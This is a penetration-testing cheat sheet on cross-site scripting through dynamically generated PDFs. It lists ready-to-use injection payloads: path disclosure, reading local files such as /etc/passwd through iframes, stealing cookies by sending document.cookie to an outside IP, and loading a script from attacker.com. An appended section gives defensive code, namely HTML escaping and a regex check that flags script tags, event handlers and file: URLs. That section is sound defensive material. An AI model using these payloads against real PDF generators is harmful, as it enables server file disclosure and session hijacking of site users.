XSS with Dynamic PDF
Last modified: 2023-02-21
If a PDF file is generated somewhere on the website and our payload is reflected in it, we can insert malicious code.
Exploitation
Insert the payload into the POST parameters.
Basic
<img src='x' onerror="document.write('test')">
<script>document.write('test')</script>
Path Disclosure
<img src='x' onerror="document.write(JSON.stringify(window.location))">
<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>
LFI/RFI
<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>
<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
Cookie Hijacking
<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">
External Scripts
<script src="http://attacker.com/test.js"></script>
<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />
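Defensive counterpart to the payloads above, as an added example that is not part of the original page: the payloads only run when a request value reaches the HTML handed to the PDF renderer without encoding. The template, the customerName field and the function names are hypothetical; the test inputs are payloads copied from this page.

```javascript
// Added example; the template and the customerName field are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag or break out of an attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the POST parameter is concatenated into the markup as-is.
function buildReportUnsafe(customerName) {
  return `<html><body><h1>Report for ${customerName}</h1></body></html>`;
}

// Hardened pattern: the parameter is encoded, so the renderer sees text only.
function buildReportSafe(customerName) {
  return `<html><body><h1>Report for ${escapeHtml(customerName)}</h1></body></html>`;
}

// Pre-render check: flag markup that can run script or load other resources.
const ACTIVE_MARKUP = [
  /<\s*script\b/i,
  /<\s*(iframe|object|embed|link|meta|base)\b/i,
  /<[^>]*\son\w+\s*=/i, // inline event handlers such as onerror=
  /<[^>]*\b(src|href)\s*=\s*["']?\s*file:/i, // local file URLs inside a tag
];

function findActiveMarkup(html) {
  return ACTIVE_MARKUP.filter((re) => re.test(html)).map((re) => re.source);
}

// Payloads copied from this page, used only as test input.
const PAGE_PAYLOADS = [
  `<img src='x' onerror="document.write('test')">`,
  `<script>document.write('test')</script>`,
  `<iframe src="file:///etc/passwd"></iframe>`,
  `<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">`,
];

// Number of findings per payload for a given template builder.
function audit(builder) {
  return PAGE_PAYLOADS.map((p) => findActiveMarkup(builder(p)).length);
}

console.log('unsafe:', audit(buildReportUnsafe));
console.log('safe:  ', audit(buildReportSafe));
```

Output encoding fits fields that are meant to be plain text. The regex check is a coarse tripwire for logging or rejecting requests before rendering, not a sanitizer.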